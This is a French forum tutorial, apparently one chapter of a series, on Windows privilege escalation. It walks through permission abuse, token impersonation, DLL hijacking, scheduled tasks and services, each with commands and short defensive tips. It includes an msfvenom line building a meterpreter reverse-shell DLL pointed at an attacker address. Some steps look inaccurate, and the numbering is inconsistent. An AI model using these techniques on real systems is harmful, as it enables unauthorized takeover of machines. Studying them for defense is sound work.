Tutorial Élévation de privilèges sous Windows : de l'utilisateur au roi

Discussion dans 'Informatique' créé par Sι∂яα∂ι, 12 Juin 2025.

  1. Sι∂яα∂ι

    Sι∂яα∂ι Administrateur

    Inscrit:
    25 Juin 2014
    Messages:
    17 327
    J'aime reçus:
    58 759
    Points:
    13 043
    L’élévation de privilèges est l’étape clé qui transforme un accès basique en contrôle total. Elle permet aux attaquants de passer d’un simple compte utilisateur à des droits d’administrateur ou SYSTEM. Voyons comment ce tour de magie opère… et surtout, comment l’arrêter.

    Les 2 types d'escalade de privilèges

    Escalade verticale : de User à Admin/SYSTEM
    Escalade horizontale : voler l’accès d’un autre utilisateur (même niveau)

    Dans les deux cas, les hackers cherchent à étendre leur pouvoir sur le système ou le réseau.

    Techniques classiques d'escalade de privilèges Windows

    1. Permissions mal configurées
    • Fichiers ou dossiers accessibles en écriture à tous
    • Possibilité de remplacer un EXE par un malware

    Exploitation :
    1. Scanner les permissions :
    Code:
    icacls C:\Chemin\Vers\Fichier
    2. Rechercher les droits Everyone:F
    3. Remplacer l'exécutable
    4. Attendre son exécution

    Défenses :
    • Auditer régulièrement les permissions
    • Restreindre l’accès aux fichiers sensibles

    2. Usurpation de jeton (Token Impersonation)
    • Windows utilise des jetons d'accès pour représenter les identifiants
    • Un jeton Admin mal protégé = accès root

    Exploitation :
    1. Enumérer les jetons :
    Code:
    Invoke-TokenManipulation -Enumerate
    2. Usurper un jeton :
    Code:
    runas /user:Administrateur “cmd.exe”
    Défenses :
    • Désactiver la délégation inutile
    • Utiliser Credential Guard

    3. DLL Hijacking
    • Les applis chargent parfois des DLL depuis des emplacements non sécurisés
    • Un hacker peut injecter un fichier piégé

    Exploitation :
    1. Identifier une appli vulnérable
    2. Créer une DLL piégée :
    Code:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > malicieux.dll
    3. Remplacer la DLL
    4. Lancer l’appli

    Défenses :
    • Vérifier la signature des DLL
    • Éviter les applis chargées depuis des répertoires douteux

    Astuce 11 : détourner une tâche planifiée

    Certaines tâches planifiées tournent avec des droits élevés. Mal configurées, elles deviennent des portes d’entrée en or.

    Exploitation :
    1. Lister les tâches :
    Code:
    schtasks /query /fo LIST /v
    2. Vérifier les droits via AccessChk
    3. Modifier l'exécutable associé
    4. Lancer la tâche :
    Code:
    schtasks /run /tn “NomDeLaTâche”
    Défenses :
    • Interdire l’écriture sur les tâches critiques
    • Auditer les tâches régulièrement

    Astuce 12 : exploiter un service mal sécurisé

    Un service Windows mal configuré peut devenir une backdoor royale pour l’élévation de privilèges.

    Exploitation :
    1. Lister les services :
    Code:
    sc qc “NomDuService”
    2. Chercher les binaires modifiables
    3. Remplacer l’exécutable
    4. Redémarrer le service :
    Code:
    sc start “NomDuService”
    Défenses :
    • Contrôle strict des accès aux services
    • Revue régulière des configurations

    Outils avancés pour l'escalade de privilèges

    PowerUp
    • Script PowerShell pour détecter failles et mauvaises configs
    • Usage :
    Code:
    Import-Module .\PowerUp.ps1
    Invoke-AllChecks
    Windows Exploit Suggester
    • Repère les vulnérabilités exploitables à partir des patchs manquants
    • Usage :
    Code:
    windows-exploit-suggester.py –update
    windows-exploit-suggester.py -d database -i systeminfo.txt

    Conclusion du chapitre

    Tu sais maintenant :
    • Identifier et exploiter les erreurs de configuration
    • Utiliser les tâches, services, DLL et jetons à ton avantage
    • Défendre un système contre ces attaques critiques

    Dans le chapitre suivant, cap sur la gestion des comptes utilisateurs Windows : récupération, réinitialisation, et accès furtif garantis.
     

Partager cette page

  1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
    Rejeter la notice